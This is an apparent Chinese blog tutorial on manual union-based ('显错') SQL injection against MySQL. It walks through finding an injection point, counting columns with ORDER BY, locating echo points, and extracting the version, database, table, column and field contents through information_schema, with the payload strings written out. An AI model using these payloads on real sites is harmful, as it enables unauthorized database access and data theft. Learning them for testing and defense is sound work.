安科网

sql注入 --显错注入

jiong

jiong

2020-09-17

关注 关注

前提知识

数据库:就是将大量数据把保存起来,通过计算机加工而成的可以高效访问数据库的数据集合
数据库结构:
库:就是一堆表组成的数据集合
表:类似 Excel,由行和列组成的二维表
字段:表中的列称为字段
记录:表中的行称为记录
单元格:行和列相交的地方称为单元格
在数据库里有一个系统库:information_schema
在它里面有个存着所有库名的表:schemata schema_name 库名

在它里面有个存着所有表名的表:tables
表名 table_schema 表属于库 table_name  表名

在它里面还有个存着所有字段名的表:columns
table_schema 表属于库    table_name  表名      column_name 字段名


数据库结构中常用:table_schema库名 table_name表名 column_name字段名优先记忆

数据库中简单查询语句

select * from 表:从表里查询所有内容
where :有条件的从表中选取数据
and或or  :条件有点多时候从表中选取数据
order by :根据指定的结果集/指定的列进行排序
limit 0,1 :从第一行起显示一条记录
union select :将多个表拼在一起

sql注入

攻击者通过构造不同的SQL语句来实现对数据库的操作。

任何与数据库产生交互的地方都可能存在sql注入

sql显错注入-联合查询(Mysql数据库)的基本流程及常用语句

sql注入 --显错注入

 sql手注的一般流程
一、判断注入点

如为整数型注入

id=1‘ 后面加上‘单引号,页面出错

id=1 and 1=1

id=1 and 1=2 时页面不同判断存在注入
二、判断字段数

常用order by 判断字段数

order by :ORDER BY 语句用于根据指定的列对结果集进行排序。
如:

id=1 order by 3 页面正常
id=1 order by 4 页面错误

则字段数为3

三、判断回显点

使用联合查询

id =1 and 1=2 union select 1,2,3 前面为假是会查询后面的语句,从而可获得回显点


四、查询相关内容

查询数据库版本
and 1=2 union select 1,version(),3
查询数据库库名

and 1=2 union select 1,database(),3

猜询表名
and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘库名‘

查询字段名
and 1=2 union select 1,group_concat(column_name),3from information_schema.columns where table_schema=database() and table_name=‘表名‘

查询字段内容
and 1=2 union select 1,字段名 from 表名,3

若为单引号或双引号注入

考虑拼接为正常字符串进行逃逸

如;

id=1‘ union select 1,字段名 from 表名,3 -- +

后方为--+或-- a 或# 在很多数据库中杠杠加为注释符,在mysql中#为注释符,推荐常用--+

select sql注入 数据库 sql注入攻击 sql数据库 table

jiong

jiong

0 关注 0 粉丝 0 动态

关注 关注

相关推荐

SQL 创建、更新和删除视图的方法

视图是可视化的表。本章讲解如何创建、更新和删除视图。视图包含行和列,就像一个真实的表。您可以向视图添加 SQL 函数、WHERE 以及 JOIN 语句,也可以呈现数据,就像这些数据来自于某个单一的表一样。视图 "Current Product L

whyname 2020-08-16

sql优化的几种方式

= 或 <> 操作符不会使用索引,而对于 < 、 <= 、 = 、 > 、 >= 、 BETWEEN AND,数据库才会使用索引。因此对于上面的查询,正确写法应该是:select name from table wher

明月清风精进不止 2020-07-05

SQL语句优化的理解

然后是某一条SQL 语句一直执行的很慢,可能的原因有没有用到索引,例如该字段没有索引;由于对字段进行运算、函数操作导致无法用索引,或者是数据库选错了索引。这种情况是我们要关心的,需要进行SQL语句的优化,简单来说就是该用索引就要用索引,避免全表扫描。

URML 2020-07-04

SQL 语法:一些最重要的 SQL 命令简介

一个数据库通常包含一个或多个表。每个表有一个名字标识,表包含带有数据的记录(行)。在本教程中,我们在 MySQL 数据库中创建了 Websites 表,用于存储网站记录。| id | name | url

CSDN0BLOG 2020-06-21

SQL 的服务器端编程---T-SQL简介

Transact-SQL 的缩写为T-SQL,T-SQL是Microsoft 公司的SQL Server的数据库语言,它是对标准SQL语言的扩充。数据库中的数据通常需要定义一个数据类型,不同DBMS具体支持的数据类型大体相同,稍有差异,具体可参阅相关手册。

goodriver 2020-06-17

ThinkPHP5 链式操作table用法

table方法主要用于指定操作的数据表。用法一般情况下,操作模型的时候系统能够自动识别当前对应的数据表,所以,使用table方法的情况通常是为了:。需要注意的是table方法不会改变数据库的连接,所以你要确保当前连接的用户有权限操作相应的数据库和数据表。切

FellowYourHeart 2020-10-05

Mysql入门 DML语句大全DML、DDL、DCL

Mysql 数据库语句 1、说明:创建数据库CREATE DATABASE database-name2、说明:删除数据库drop database dbname3、说明:备份sql server--- 创建 备份数据的 deviceUSE masterE

好记忆也需烂 2020-07-28

Golang 定时器(Timer 和 Ticker),这篇文章就够了

Golang 原生 time 包下可以用来执行一些定时任务或者是周期性的任务的一个工具。本文基于 Go 1.14,如果以下文章有哪里不对或者问题的地方,欢迎讨论学习。定时器的日常使用。timer.Stop() // 这里来提高 timer 的回收。tCha

专注前端开发 2020-10-21

Mysql 实现字段拼接的三个函数

给运营导出数据时,难免需要对字段进行拼接,如果 Mysql 可以完成的话,就可以少些很多代码。不过如果有字段值为 NULL,则结果为 NULL。上面这种方式如果想要使用分隔符分割,就需要每个字段中间插一个字符串,非常麻烦。concat_ws() 可以一次性

苏康申 2020-11-13

详解 MySQL中count函数的正确使用方法

当搞清楚count函数的运行原理后,相信上面几个问题的答案就会了然于胸。为了解决上述的问题,我创建了一张 user 表,它有两个字段:主键id和name,后者可以为null,建表语句如下。`id` int NOT NULL AUTO_INCREMENT C

vitasfly 2020-11-12

oracle锁表该如何解决

where l.object_id = o.object_id and l.session_id=s.sid;如果杀不掉可以加个 immediate 立即杀掉 试试;如果利用上面的命令杀死一个进程后,进程状态被置为"killed",但是

oraclemch 2020-11-06

SQL Server如何通过创建临时表遍历更新数据详解

前段时间新项目上线为了赶进度很多模块的功能都没有经过详细的测试导致了生成环境中的数据和实际数据对不上,因此需要自己手写一个数据库脚本来更新下之前的数据。关于数据统计汇总的问题肯定会用到遍历统计汇总,那么问题来了数据库中如何遍历呢?好像并没有for和fore

liuyang000 2020-09-25

Orcle11G创建表空间,创建用户,授权等操作

CREATE USER caiyl IDENTIFIED BY 123456 DEFAULT TABLESPACE caiyl_space;GRANT CREATE USER,DROP USER,ALTER USER ,CREATE ANY VIEW ,A

赵继业 2020-08-17

oracle 日期操作语句总结

SELECT TO_CHAR AS YEAR FROM DUAL--查询当前年份。SELECT TO_CHAR AS MONTH FROM DUAL--获取当前日期的'YYYY/MM/DD'格式:2020/01/02. SELECT TO_CHAR AS

Seandba 2020-08-16

ORACLE数据库中Rownum用法详解

ORACLE 中ROWNUM用法总结!对于 Oracle 的 rownum 问题,很多资料都说不支持>,>=,=,between...and,只能用以上符号(<、<=、!=),并非说用>,& gt;=,=,betwee

dbasunny 2020-08-16

MySQL如何创建视图

可以使用 CREATE VIEW 语句来创建视图。该名称在数据库中必须是唯一的,不能与其他表或视图同名。用户除了拥有 CREATE VIEW 权限外,还具有操作中涉及的基础表和其他视图的相关权限。SELECT 语句不能包含 FROM 子句中的子查询。可使用

拼命工作好好玩 2020-08-15

详细分析mysql视图的原理及使用方法

在MySQL中,视图可能是我们最常用的数据库对象之一了。那么你知道视图和表的区别吗?可能很多人对视图只是一知半解,想详细了解视图的同学看过来哟,本篇文章会详细介绍视图的概念、创建及使用方法。当我们创建一个视图的时候,实际上是在数据库里执行了SELECT语句

langyue 2020-08-15

MySQL约束

分别查询男、女同学的平均分,人数 要求:分数低于70分的人,不参与分组,分组之后。

好记忆也需烂 2020-08-15

MySQL实现根据当前ID读取上一条和下一条记录

SELECT * FROM A WHERE ID < 5 ORDER BY ID DESC LIMIT 0,1; ps: select * from table1 where id<$id order by iddesc limit

写程序的赵童鞋 2020-08-03

mysql 14 覆盖索引+回表

MySQL可以利用索引返回select列表中的字段值。而不必根据主键再次读取聚簇索引数据文件查到数据,也就是平时所说的不需要回表操作。覆盖索引其实是索引覆盖的意思,索引字段就已经囊括select查询的字段,即索引字段覆盖了需查询的字段。t; 即id是聚集索

Accpcjg 2020-08-02
jiong

jiong

W3CSchool教程
HTML 教程
CSS 教程
Bootstrap 教程
Javascript 教程
jQuery 教程
后端教程
C 教程
Java 教程
PHP 教程
Python 教程
Go 教程
移动开发
Android 教程
Swift 教程
Kotlin 教程
jQuery Mobile 教程
ionic 教程
关于我们
新闻动态
联系方式
招聘英才
安科实验室
帮助与反馈

安科网(Ancii),中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号 京公网安备11010802014868号